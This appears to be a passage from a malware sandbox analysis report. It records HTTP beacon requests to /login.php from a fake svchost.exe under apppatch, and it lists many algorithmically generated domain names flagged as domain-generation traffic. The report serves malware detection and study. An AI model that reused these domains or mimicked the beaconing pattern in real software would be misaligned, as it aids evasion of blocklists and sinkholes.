    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Cookie: __tad=1731346399.2937263
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Cookie: __tad=1731346399.8350699
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20241112-0433-4491-9018-901015a08e06 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731346399.2937263; parking_session=41dc0dcd-166b-4eb6-a959-38d5d6625e06
    Source: HTTP traffic: GET /login.php?sub1=20241112-0433-44f6-9e59-dc72adbb0086 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731346399.8350699
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346389|1731346389|0|1|0
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346389|1731346389|0|1|0
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478891988923922560
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346388|1731346388|0|1|0
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346388|1731346388|0|1|0; snkz=66.23.206.109
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: btst=e8a049cc40d6b9d00effb9629f14927b|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478891988923922560
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
    Queries random domain names (often used to prevent blacklisting and sinkholes)
    Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
    Tries to resolve many domain names, but no domain seems valid
    Source: unknownDNS traffic detected: query: qexysig.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzypug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumytup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahynus.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykyjux.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebylov.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofydac.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupytyl.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupydig.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyriq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujyxyl.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufybyv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volydot.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyvah.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetytug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvyxil.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufymyg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purywop.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrygyn.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonymuf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofyqit.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzyxyv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopyret.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujymip.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyvuv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galypyh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyfyb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyxuv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqyzuw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumywaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqyhuz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowydef.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqysag.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volykit.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonycum.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyxul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyrip.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacykeh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowybof.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyneh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxymed.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupypep.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryfyd.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyvoq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyhup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyhis.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyrol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysymux.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadypuw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqyvob.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyheq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekykup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocycuc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryxij.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexykug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volyzef.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyfaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyfel.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofygum.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahykih.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqykab.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonyzuf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvymul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyveg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofykoc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopycom.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykygaj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacykub.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojygok.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowykaf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowymyk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymyvin.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetyrap.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonydik.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatycoh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofymik.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvyjop.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purydyv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowyzuk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyqih.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegytyv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojykom.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopykak.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxylor.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofygaf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvymaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymylyr.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedynaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujygaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatydaw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygywor.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysywon.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyquw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysyvud.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysysod.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyrab.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegysoq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegynap.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufygug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysyfyj.com replaycode: Server failure (2)
    Source: unknownDNS traffic detected: query: puvyliv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrylix.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyvyz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetyfop.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyfyq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purycap.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purydip.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyveb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofybyf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetyvil.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvylod.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purycul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyfuh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonyqok.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonyjim.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrytod.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volypum.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykymox.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyhiw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedysov.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacypyz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupypiv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyxov.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purytyg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganydiw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryvex.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzyjoq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykyvod.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufyjuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonypyf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqyzoh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqykog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowydic.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocyrom.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyqow.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopyjuf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumyjig.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetylyv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volymum.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumybal.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocyzek.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumymuv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrytun.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymymud.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetyquq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganycuh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyvas.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykynyj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyqog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volymaf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopybyt.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvylyn.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyhob.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebysul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacydib.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocymut.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyzys.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyduz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebytiq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupymyp.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatynes.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volyqat.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzyjyg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyqaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupycuv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvywed.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahypus.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojyjof.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahycib.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyzyh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexylup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojymic.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumypog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonyryc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzybep.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyzas.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyhyl.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowyjut.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufydep.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyhyw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysytyr.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxyfar.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufypiq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyrev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacynuz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowycac.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purypol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxyjun.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganykaz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojyrak.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryjir.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvytuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocyjic.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyqiv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyvis.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujypup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegykiq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykygur.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyduh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyhuq.com replaycode: Name error (3)
